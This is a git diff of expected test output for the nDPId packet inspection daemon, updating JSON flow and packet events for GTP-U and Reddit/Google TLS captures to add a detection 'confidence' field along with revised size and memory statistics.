+00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1550422828553,"flow_last_seen":1550422828553,"flow_idle_time":180000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1550422828553,"l3_proto":"ip4","src_ip":"145.76.2.236","dst_ip":"187.96.52.85","src_port":2152,"dst_port":2152,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"GTP.GTP_U","breed":"Acceptable","category":"Network"}}
 00432{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":106,"pkt_l4_len":0,"ts_msec":1550422828949,"pkt":"AAAAcxs8EFFy5LtdCABFeABcLoEAAEARx6qRTALsu2A0VQhoCGgASAAAMv8AOAn8kEPNcwAARQAANFkkQAB\/BgGQrBEkFT++kSvhEwBQ8LOPBjqqVCGAEAEBcqsAAAEBBQo6qnTxOqqK0Q=="}
 00223{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"thread_id":0,"packet_id":2,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","size":106,"expected":110}
 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1550422828949,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"ts_msec":1550422828949,"pkt":"AAAAcxs8EFFy5LtdCABFeABcLoEAAEARx6qRTALsu2A0VQhoCGgASAAAMv8AOAn8kEPNcwAARQAANFkkQAB\/BgGQrBEkFT++kSvhEwBQ8LOPBjqqVCGAEAEBcqsAAAEBBQo6qnTxOqqK0Q=="}
@@ -60,7 +60,7 @@
 00224{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"thread_id":0,"packet_id":79,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","size":122,"expected":126}
 00453{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":81,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":122,"pkt_l4_len":0,"ts_msec":1550422844222,"pkt":"AAAAcxs8EFFy5LtdCABFeABsUeoAAEARpDGRTALsu2A0VQhoCGgAWAAAMv8ASAn8kEM8dAAARQAARFmLQAB\/BgEZrBEkFT++kSvhEwBQ8LOPBjqqu6HAEAEB0NEAAAEBBRo6qudhOqryUTqqwRk6qswJOqrRgTqq1vk="}
 00224{"basic_event_id":15,"basic_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"thread_id":0,"packet_id":81,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","size":122,"expected":126}
-00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":82,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":82,"flow_first_seen":1550422828553,"flow_last_seen":1550422844224,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":74496,"flow_avg_l4_payload_len":908,"midstream":0,"ts_msec":1550422844224,"l3_proto":"ip4","src_ip":"145.76.2.236","dst_ip":"187.96.52.85","src_port":2152,"dst_port":2152,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"GTP.GTP_U","breed":"Acceptable","category":"Network"}}
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":82,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":82,"flow_first_seen":1550422828553,"flow_last_seen":1550422844224,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":74496,"flow_avg_l4_payload_len":908,"midstream":0,"ts_msec":1550422844224,"l3_proto":"ip4","src_ip":"145.76.2.236","dst_ip":"187.96.52.85","src_port":2152,"dst_port":2152,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"GTP.GTP_U","breed":"Acceptable","category":"Network"}}
 00166{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":82,"source":"reasm_segv_anon.pcapng","alias":"nDPId-test","total-events-serialized":64}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 82/82
@@ -70,10 +70,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4597207 bytes
-~~ total memory freed........: 4597207 bytes
-~~ total allocations/frees...: 99635/99635
+~~ total memory allocated....: 4682160 bytes
+~~ total memory freed........: 4682160 bytes
+~~ total allocations/frees...: 101225/101225
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 171 chars
-~~ json string max len.......: 670 chars
-~~ json string avg len.......: 428 chars
+~~ json string max len.......: 696 chars
+~~ json string avg len.......: 441 chars
diff --git a/test/results/reddit.pcap.out b/test/results/reddit.pcap.out
index c2968ef19..1ef44a799 100644
--- a/test/results/reddit.pcap.out
+++ b/test/results/reddit.pcap.out
@@ -7,24 +7,24 @@
 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1605291684452,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291684452,"pkt":"qtsDr8lk5EKm5WPyht1gCYCjACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3O4Bu5iiLjUAAAAAoAL9IMZSAAACBAWgBAIICql037gAAAAAAQMDBw=="}
 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1605291684476,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291684476,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgKAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbucXOWkwh+EoHfGoBJXgJjYAAACBAV4AQMDAwQCCArC1zJs1N1gBw=="}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1605291684476,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291684476,"pkt":"qtsDr8lk5EKm5WPyht1gBBqZACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICgAAAAAAACAKnFwBu4Sgd8blpMIggBAB+xzRAAABAQgK1N1gIMLXMmw="}
-00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291684451,"flow_last_seen":1605291684476,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291684476,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40028,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291684451,"flow_last_seen":1605291684476,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291684476,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40028,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291684481,"flow_last_seen":1605291684481,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605291684481,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1605291684481,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291684481,"pkt":"qtsDr8lk5EKm5WPyht1gB3LfACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PABuxF7CxQAAAAAoAL9IHB8AAACBAWgBAIICql039UAAAAAAQMDBw=="}
 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1605291684485,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291684485,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgKAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbucXoJUF9DimtmGoBJXgOayAAACBAV4AQMDAwQCCArC1zJ11N1gBw=="}
 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1605291684485,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291684485,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc7vvL1mKYoi42oBJXgKSSAAACBAV4AQMDAwQCCArC1zJ1qXTfuA=="}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1605291684485,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291684485,"pkt":"qtsDr8lk5EKm5WPyht1gDERGACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICgAAAAAAACAKnF4Bu+Ka2YaCVBfRgBAB+2qiAAABAQgK1N1gKcLXMnU="}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1605291684485,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291684485,"pkt":"qtsDr8lk5EKm5WPyht1gCYCjACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3O4Bu5iiLjb7y9ZjgBAB+yiDAAABAQgKqXTf2cLXMnU="}
-00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291684451,"flow_last_seen":1605291684485,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291684485,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40030,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291684452,"flow_last_seen":1605291684486,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291684486,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291684451,"flow_last_seen":1605291684485,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291684485,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40030,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00937{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291684452,"flow_last_seen":1605291684486,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291684486,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1605291684551,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291684551,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc8HTo0uYRewsVoBJXgNkGAAACBAV4AQMDAwQCCArC1zKKqXTf1Q=="}
-00976{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291684451,"flow_last_seen":1605291684551,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291684551,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40028,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"safebrowsing.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01002{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291684451,"flow_last_seen":1605291684551,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291684551,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40028,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"safebrowsing.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1605291684551,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291684551,"pkt":"qtsDr8lk5EKm5WPyht1gB3LfACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PABuxF7CxV06NLngBAB+1zSAAABAQgKqXTgG8LXMoo="}
-00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291684452,"flow_last_seen":1605291684551,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1605291684551,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-01236{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":27,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1605291684452,"flow_last_seen":1605291684551,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"ts_msec":1605291684551,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","server_names":"reddit.com,*.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.reddit.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"DB:E9:D5:FE:EB:EF:68:34:55:FD:62:BA:C9:BB:04:D4:E3:22:18:81"}}
-00976{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291684451,"flow_last_seen":1605291684551,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291684551,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40030,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"safebrowsing.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291684481,"flow_last_seen":1605291684552,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291684552,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291684481,"flow_last_seen":1605291684592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1605291684592,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-01237{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291684481,"flow_last_seen":1605291684593,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"ts_msec":1605291684593,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","server_names":"reddit.com,*.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.reddit.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"DB:E9:D5:FE:EB:EF:68:34:55:FD:62:BA:C9:BB:04:D4:E3:22:18:81"}}
